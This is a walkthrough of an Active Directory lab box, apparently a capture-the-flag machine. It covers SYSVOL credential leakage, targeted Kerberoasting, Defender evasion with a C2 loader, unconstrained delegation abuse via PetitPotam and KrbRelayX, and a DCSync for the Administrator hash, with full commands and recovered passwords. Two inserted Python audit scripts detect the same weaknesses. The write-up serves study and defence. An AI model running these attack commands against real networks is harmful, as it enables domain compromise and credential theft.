Delegate
Overview
Delegate is an Active Directory machine where credentials are leaked in a plaintext SYSVOL logon script. BloodHound reveals an ACL path from A.Briggs to N.Thompson (GenericWrite → targeted Kerberoast). N.Thompson has SeEnableDelegationPrivilege allowing us to configure our own machine account with unconstrained delegation. We then use PetitPotam to coerce the DC into authenticating to our machine, capture the DC$ TGT via KrbRelayX, and perform DCSync for the Administrator hash.
Recon
Nmap
```bash
sudo nmap -sC -sV -vv -oA tcp 10.129.75.202 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.75.202
```
Standard Windows DC ports. Add dc1.delegate.vl and delegate.vl to /etc/hosts.
SMB - Guest Access and SYSVOL
Authenticate as a guest and enumerate shares:
Reading SYSVOL/delegate.vl/scripts/users.bat reveals plaintext credentials for A.Briggs:
```bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
```
Credentials: A.Briggs:P4ssw0rd1#123
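As an added defensive check that is not part of the original writeup: a small Python scanner for exactly the pattern that leaked here, a `net use ... /user:<account> <password>` line inside a logon script. The sample script is a constructed copy of the users.bat content above; the regexes, the `find_embedded_credentials`/`scan_sysvol_scripts` function names and the file-extension list are my own assumptions, not anything from the box or from a real tool.

```python
import os
import re
from typing import Dict, List

# Constructed sample: a copy of the users.bat logon script found in SYSVOL on this box
SAMPLE_SCRIPT = r"""rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
"""

# net use <drive> \\server\share /user:<account> <password>
NET_USE_USER_FIRST = re.compile(
    r"net\s+use\s+\S+\s+(?P<share>\\\\\S+)\s+/user:(?P<user>\S+)\s+(?P<password>\S+)",
    re.IGNORECASE,
)
# net use <drive> \\server\share <password> /user:<account>   (the other accepted ordering)
NET_USE_PASS_FIRST = re.compile(
    r"net\s+use\s+\S+\s+(?P<share>\\\\\S+)\s+(?P<password>[^/\s]\S*)\s+/user:(?P<user>\S+)",
    re.IGNORECASE,
)


def redact(secret: str) -> str:
    """Keep two characters so a finding is recognisable in a report without copying the secret."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"


def find_embedded_credentials(script: str) -> List[Dict[str, object]]:
    """One finding per script line that maps a share with an explicit /user: and a password."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        for pattern in (NET_USE_USER_FIRST, NET_USE_PASS_FIRST):
            m = pattern.search(line)
            if m:
                findings.append({
                    "line": lineno,
                    "share": m.group("share"),
                    "user": m.group("user"),
                    "password": m.group("password"),
                    "redacted": redact(m.group("password")),
                })
                break  # one finding per line is enough
    return findings


def scan_sysvol_scripts(root: str) -> List[Dict[str, object]]:
    """Walk a local copy of SYSVOL (path is an assumption) and scan every script file in it."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith((".bat", ".cmd", ".vbs", ".ps1")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for finding in find_embedded_credentials(fh.read()):
                        results.append({"file": path, **finding})
    return results


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_SCRIPT):
        print(f"line {f['line']}: {f['share']} as {f['user']} password {f['redacted']}")
```

Run it against a copy of the SYSVOL scripts share (`scan_sysvol_scripts("/mnt/sysvol")`) as part of a periodic audit; the two regexes only cover `net use`, so extend them for `cmdkey`, `runas /savecred` or `ConvertTo-SecureString` if your scripts use those.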
Foothold
BloodHound Mapping
With A.Briggs credentials, run a BloodHound collector:
```bash
nxc smb dc1.delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123' -d 'delegate.vl' --shares
bloodhound-ce-python -c all -u A.Briggs -p 'P4ssw0rd1#123' -d delegate.vl -dc dc1.delegate.vl --dns-tcp -ns 10.129.75.202
```
BloodHound shows A.Briggs has GenericWrite over N.THOMPSON:
Targeted Kerberoast via GenericWrite
GenericWrite over a user allows setting an SPN on that account. Once an SPN is set, the account becomes Kerberoastable - we can request a TGS and crack it offline.
Use bloodyAD to set an SPN on N.Thompson:
```bash
bloodyAD --host 10.129.75.202 -d "delegate.vl" -u 'A.Briggs' -p 'P4ssw0rd1#123' \
  set object N.THOMPSON servicePrincipalName -v 'cifs/syk0'
```
Request the TGS hash:
```bash
impacket-GetUserSPNs -dc-ip 10.129.75.202 -request -request-user N.THOMPSON \
  delegate.vl/A.Briggs:'P4ssw0rd1#123'
```
Lateral Movement
Crack N.Thompson's hash with hashcat:
```bash
hashcat -m 13100 -a 0 n.thompson_hash /mnt/hgfs/I/data/rockyou.txt
```
Cracked: N.Thompson:KALEB_2341
Defender is running on the target, so use RustHarder (a Defender-evasive loader) to deploy an AdaptixC2 agent:
AdaptixC2 beacon received:
Privilege Escalation
SeEnableDelegationPrivilege → Unconstrained Delegation
N.Thompson has SeMachineAccountPrivilege (can add computer accounts) and SeEnableDelegationPrivilege (can set delegation flags on objects). Together, these allow creating a computer account and marking it as trusted for unconstrained delegation.
Step 1 - Add a machine account:
```bash
impacket-addcomputer -dc-ip 10.129.17.200 -computer-name syk0 delegate.vl/N.THOMPSON:KALEB_2341
# [*] Successfully added machine account syk0$ with password Z0UO785ETYcs2ix1xUNzatoxI50YS8KX.
```
Step 2 - Enable unconstrained delegation on the new machine:
```bash
bloodyAD -d 'delegate.vl' -u 'N.THOMPSON' -p 'KALEB_2341' --host 10.129.17.200 \
  add uac 'syk0$' -f TRUSTED_FOR_DELEGATION
```
Step 3 - Set an SPN on the machine (required for Kerberos):
```bash
bloodyAD --host 10.129.17.200 -d 'delegate.vl' -u 'N.THOMPSON' -p 'KALEB_2341' \
  set object 'syk0$' servicePrincipalName -v 'cifs/syk0'
```
BloodHound now shows a path from our machine account to the DC via unconstrained delegation:
Step 4 - Retrieve the machine account NT hash:
Step 5 - Add a DNS record (PetitPotam needs to resolve our hostname):
```bash
bloodyAD --host 10.129.17.200 -d 'delegate.vl' -u 'N.THOMPSON' -p 'KALEB_2341' \
  add dnsRecord syk0 10.10.14.174
```
PetitPotam + KrbRelayX - Capture DC$ TGT
When a computer account is trusted for unconstrained delegation, every principal that authenticates to it with Kerberos sends along a forwardable TGT, which the machine caches. If we coerce the DC to authenticate to our machine, the DC$ TGT is stored there and can be extracted.
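The flag set in step 2 is a single bit in `userAccountControl`, which makes the condition easy to audit from the defender's side. The following Python is an added example, not part of the writeup or of bloodyAD: it decodes the UAC bits and reports every non-DC object carrying TRUSTED_FOR_DELEGATION, which is what the `syk0$` account above looks like in the directory. The object list is a constructed sample (the values mirror a DC default of 532480 and the workstation-plus-TFD combination created here); the function names are my own.

```python
from typing import Dict, Iterable, List

# userAccountControl bits (values from the AD schema / MS-ADTS)
SCRIPT = 0x0001
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000              # domain controllers
TRUSTED_FOR_DELEGATION = 0x80000           # unconstrained delegation ("TFD")
NOT_DELEGATED = 0x100000                   # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

UAC_FLAGS = {
    "SCRIPT": SCRIPT,
    "ACCOUNTDISABLE": ACCOUNTDISABLE,
    "NORMAL_ACCOUNT": NORMAL_ACCOUNT,
    "WORKSTATION_TRUST_ACCOUNT": WORKSTATION_TRUST_ACCOUNT,
    "SERVER_TRUST_ACCOUNT": SERVER_TRUST_ACCOUNT,
    "TRUSTED_FOR_DELEGATION": TRUSTED_FOR_DELEGATION,
    "NOT_DELEGATED": NOT_DELEGATED,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": TRUSTED_TO_AUTH_FOR_DELEGATION,
}

# Constructed sample of what an LDAP query for (userAccountControl=*) could return; not real directory data.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DC1$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},  # 532480
    {"sAMAccountName": "WS01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT},
    {"sAMAccountName": "syk0$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "N.Thompson", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_web", "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION},
]


def decode_uac(value: int) -> List[str]:
    """Names of the known flag bits set in a userAccountControl value, lowest bit first."""
    return [name for name, bit in sorted(UAC_FLAGS.items(), key=lambda kv: kv[1]) if value & bit]


def audit_unconstrained_delegation(objects: Iterable[Dict]) -> List[str]:
    """sAMAccountNames trusted for unconstrained delegation that are not domain controllers.

    DCs carry TRUSTED_FOR_DELEGATION by default; any other object with the bit set is a
    credential-harvesting point and should be reviewed (or moved to constrained/RBCD)."""
    flagged = []
    for obj in objects:
        uac = int(obj["userAccountControl"])
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            flagged.append(obj["sAMAccountName"])
    return flagged


if __name__ == "__main__":
    for obj in SAMPLE_OBJECTS:
        print(f"{obj['sAMAccountName']:<12} {obj['userAccountControl']:>9}  {', '.join(decode_uac(obj['userAccountControl']))}")
    print("Non-DC objects with unconstrained delegation:", audit_unconstrained_delegation(SAMPLE_OBJECTS))
```

In a real environment feed `audit_unconstrained_delegation` the result of an LDAP search such as `(userAccountControl:1.2.840.113556.1.4.803:=524288)` and alert on any hit that is not a DC; the complementary control is reviewing who holds SeEnableDelegationPrivilege on the DCs, since without it N.Thompson could not have set the bit.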
Start KrbRelayX to capture incoming Kerberos tickets:
```bash
python3 krbrelayx.py -hashes :22C08F3D9EE067612378953FC70D14C4
```
Use PetitPotam to coerce the DC into authenticating to our machine via MS-EFSRPC:
```bash
python3 PetitPotam.py -target-ip 10.129.17.200 -dc-ip 10.129.17.200 \
  -u 'syk0$' -p 'Z0UO785ETYcs2ix1xUNzatoxI50YS8KX' syk0 dc1.delegate.vl
```
KrbRelayX captures the DC$ TGT. Use it to perform DCSync:
```bash
impacket-secretsdump -just-dc-user Administrator -k dc1.delegate.vl
```
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | SYSVOL logon script | A.Briggs:P4ssw0rd1#123 |
| Discovery | BloodHound | GenericWrite over N.Thompson |
| Lateral movement | Targeted Kerberoast → hashcat | N.Thompson:KALEB_2341 |
| Evasion | RustHarder + AdaptixC2 | Beacon (Defender bypass) |
| Privesc setup | addcomputer + unconstrained delegation | syk0$ TFD |
| TGT capture | PetitPotam + KrbRelayX | DC$ TGT |
| Domain admin | DCSync | Administrator hash |